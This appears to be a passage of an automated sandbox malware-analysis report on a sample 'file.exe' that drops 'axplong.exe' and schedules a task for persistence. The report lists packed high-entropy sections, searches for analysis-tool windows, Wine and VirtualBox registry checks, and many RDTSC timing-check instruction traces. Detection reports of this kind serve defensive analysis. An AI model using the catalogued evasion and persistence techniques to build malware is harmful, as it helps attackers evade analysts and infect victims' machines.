                    Source: axplong.exe.0.dr Static PE information: section name: mtnloani
                    Source: axplong.exe.0.dr Static PE information: section name: bcuuovzp
                    Source: axplong.exe.0.dr Static PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_002CD84C push ecx; ret 6_2_002CD85F
                    Source: file.exe Static PE information: section name: entropy: 7.981756657229513
                    Source: file.exe Static PE information: section name: mtnloani entropy: 7.954149945480765
                    Source: axplong.exe.0.dr Static PE information: section name: entropy: 7.981756657229513
                    Source: axplong.exe.0.dr Static PE information: section name: mtnloani entropy: 7.954149945480765
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
                    Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job
                    Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720C6B second address: 720D20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D045407h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F488D045407h 0x0000000f jmp 00007F488D045402h 0x00000014 popad 0x00000015 popad 0x00000016 mov dword ptr [esp], eax 0x00000019 sub ebx, dword ptr [ebp+122D29DEh] 0x0000001f push dword ptr fs:[00000000h] 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007F488D0453F8h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 0000001Ch 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 mov ebx, dword ptr [ebp+122D35E5h] 0x0000004d mov edi, edx 0x0000004f mov eax, dword ptr [ebp+122D0339h] 0x00000055 or edi, dword ptr [ebp+122D29AEh] 0x0000005b push FFFFFFFFh 0x0000005d nop 0x0000005e jmp 00007F488D045406h 0x00000063 push eax 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 popad 0x00000069 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720D20 second address: 720D2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F488C756CF6h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722C65 second address: 722CC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 adc di, 5C9Fh 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F488D0453F8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 sub dword ptr [ebp+122D2E89h], esi 0x0000002f push 00000000h 0x00000031 xchg eax, esi 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 jmp 00007F488D0453FCh 0x0000003a jmp 00007F488D045403h 0x0000003f popad 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722CC3 second address: 722CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F488C756CFBh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722E32 second address: 722E36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 723EC6 second address: 723ECC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 724BF5 second address: 724BFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 723ECC second address: 723EDF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F488C756CF8h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722EE3 second address: 722EE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 723EDF second address: 723EE4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726D59 second address: 726D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726D5D second address: 726D61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726D61 second address: 726D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726D6B second address: 726D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F488C756CFCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726D7B second address: 726D85 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F488D0453F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D928B second address: 6D9297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F488C756CF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D9297 second address: 6D92B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F488D045409h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7275D0 second address: 7275D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7275D4 second address: 7275DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 729514 second address: 729530 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F488C756CF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F488C756D00h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 729530 second address: 72956D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a ja 00007F488D0453F6h 0x00000010 pop eax 0x00000011 pop ebx 0x00000012 nop 0x00000013 mov dword ptr [ebp+122D251Fh], edi 0x00000019 pushad 0x0000001a pushad 0x0000001b sub cl, FFFFFFE7h 0x0000001e mov ebx, dword ptr [ebp+122D2B26h] 0x00000024 popad 0x00000025 mov cl, 89h 0x00000027 popad 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c mov ebx, 0C378E5Bh 0x00000031 xchg eax, esi 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 jnc 00007F488D0453F6h 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72956D second address: 729572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B6B3 second address: 72B6B8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C701 second address: 72C705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C705 second address: 72C70B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D824 second address: 72D828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D828 second address: 72D832 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A7EA second address: 72A7EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B875 second address: 72B87B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C900 second address: 72C904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D9E5 second address: 72D9E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B87B second address: 72B87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F7F0 second address: 72F879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jmp 00007F488D045409h 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F488D0453F8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 movzx ebx, di 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebx 0x00000030 call 00007F488D0453F8h 0x00000035 pop ebx 0x00000036 mov dword ptr [esp+04h], ebx 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc ebx 0x00000043 push ebx 0x00000044 ret 0x00000045 pop ebx 0x00000046 ret 0x00000047 xchg eax, esi 0x00000048 push edi 0x00000049 jl 00007F488D045403h 0x0000004f jmp 00007F488D0453FDh 0x00000054 pop edi 0x00000055 push eax 0x00000056 js 00007F488D045400h 0x0000005c pushad 0x0000005d push edx 0x0000005e pop edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E97A second address: 72E97E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E97E second address: 72E990 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F488D0453F8h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7308B7 second address: 7308BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7308BD second address: 7308CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F488D0453F6h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F95B second address: 72F97B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F488C756D08h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7308CA second address: 7308CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7329ED second address: 7329F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73585E second address: 735864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 735864 second address: 73587E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F488C756D06h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73587E second address: 735882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7389FC second address: 738A06 instructions: 0x00000000 rdtsc 0x00000002 je 00007F488C756CF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739C02 second address: 739C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739C07 second address: 739C44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F488C756D21h 0x0000000f jmp 00007F488C756D07h 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CD507 second address: 6CD515 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E32E second address: 73E332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73DA96 second address: 73DABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D0453FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F488D0453F6h 0x00000011 jmp 00007F488D045400h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74273D second address: 742741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74283F second address: 742864 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F488D0453FEh 0x00000008 je 00007F488D0453F6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 push esi 0x00000014 jl 00007F488D0453FCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742864 second address: 742872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742872 second address: 742877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742877 second address: 74287C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 747DFE second address: 747E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F488D045400h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 748263 second address: 748267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 748267 second address: 748285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F488D045406h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 748285 second address: 748297 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756CFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 748715 second address: 74871B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74BDA3 second address: 74BDA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74BDA7 second address: 74BDCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D0453FAh 0x00000007 jmp 00007F488D045401h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC8CB second address: 6DC8D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC8D1 second address: 6DC8D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC8D5 second address: 6DC8DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC8DF second address: 6DC920 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F488D045410h 0x00000010 jmp 00007F488D045408h 0x00000015 push edx 0x00000016 pop edx 0x00000017 jno 00007F488D045407h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75358F second address: 753594 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7536F9 second address: 753709 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007F488D0453F6h 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 753709 second address: 75373D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F488C756D06h 0x00000010 je 00007F488C756CF6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 753A92 second address: 753A98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75419E second address: 7541A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700BDB second address: 700BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700BE4 second address: 700BE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 754A4B second address: 754A8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D0453FFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F488D045403h 0x00000011 jmp 00007F488D045405h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7532AF second address: 7532C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F488C756CF6h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7532C1 second address: 7532C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A8CB second address: 75A8E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D02h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A8E3 second address: 75A8E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759C28 second address: 759C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759C2E second address: 759C43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F488D045401h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759C43 second address: 759C73 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F488C756CF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F488C756D10h 0x00000016 jmp 00007F488C756D08h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759C73 second address: 759C87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D0453FFh 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759DF6 second address: 759DFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759DFB second address: 759E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A1EA second address: 75A1F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A1F0 second address: 75A1FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A1FB second address: 75A205 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F488C756CF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A205 second address: 75A20B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A20B second address: 75A225 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F488C756D04h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700035 second address: 700042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F488D0453FCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
